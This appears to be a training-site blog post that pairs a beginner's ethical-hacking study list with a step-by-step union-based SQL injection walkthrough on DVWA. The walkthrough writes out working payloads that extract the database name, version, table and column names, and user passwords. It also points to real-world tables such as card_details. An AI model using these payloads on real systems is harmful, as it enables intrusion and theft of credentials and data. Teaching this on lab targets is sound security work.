Application Security Training Fees

Getting into ethical hacking as a beginner, one has confusion about where to start. There are many resources but the only question remains in mind for a beginner is "What is the zero level to start?". But, here are some tips for you if you want to get started.

Get knowledge on,

Networking:

• OSI, TCP/IP models
• TCP/UDP Differences and Flags
• Three-way handshake(SYN, SYN&ACK, ACK)
• Ports and IP, how it works
• Mostly used port numbers
• Public and Private addresses
• Definitions of DHCP, ARP and how they work
• Subnetting(Just introduction is excellent)

Cryptography:

• Descriptions of Symmetric and Asymmetric encryptions
• What is Public key and Private key
• Hash and Encryption difference
• HTTPS and why to use SSL/TLS

Programming:

• "Eeew not C" go for basics of python. Programming is not compulsory, But always preferable.

Other:

• Get familiar with basic Linux commands.
• Using Putty or SSH
• How Server/Client works in networking model.
• How HTTP protocol works

Again, it is always prefered to know these domains, no need to be an expert. Always remember, Practice while you learn. Learn while you practice.

Union Based Injection:

Technology: php
Database: Mysql

The main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).

DVWA: Damnn Vulnerable Web Application:
A legal application, for security proffesionals to test their skills in some legal platforms.

Union Based Sql Injection:

Dvwa: Low Level

Step 1: Find GET Method on website

url:

?id=1
?pid=98765
?clothes=jean
?product=ilk

?Something=something

By trying, every possible option on website i.e search, links, submit, help etc

Step 2: Try or Check for Exception Handling

?id=2'

try inverted comma('), after value of get method

Result:
If any sql error is there, images missing, content corrupted etc
=> Website is vulnerable for SQL Injection


Step 3: Check No. of Column: "order by"


id=2' order by 1--+   ==> Normal result
id=2' order by 2--+   ==> Normal result
id=2' order by 3--+   ==> Normal result
id=2' order by 4--+   ==> Normal result
id=2' order by 5--+   ==> error

So, No. of column = 4

Step 4: Check for vulnerable column no. among (1,2,3,4)

id=2' union select 1,2,3,4--+

Result= 2/3/1/4

This will show some random number on screen, that no. will be vulnerable for further injection

Step 5: Get name of database

database()

id=2' union select 1,database(),3,4--+  

Step 6: Get version of database

version()

id=2' union select 1,version(),3,4--+  

Step 7: Get list of tables

id=2' union select 1,table_name,3,4 from information_schema.tables--+  

Result: Will list all tables and we have to select those table name, which seems to be having sensitive information

admin
users
login
passwrds
credit
debit
card_details
..
..
etc

Step 8: Get Columns of selected table

id=2' union select 1,column_name,3,4 from information_schema.columns where table_name="users"--+

Result: user,password

Step 9: Get Data of respected column names

id=2' union select 1,user,3,4 from users--+

Result: This

id=2' union select 1,passowrd,3,4 from users--+

md5 encrypted password.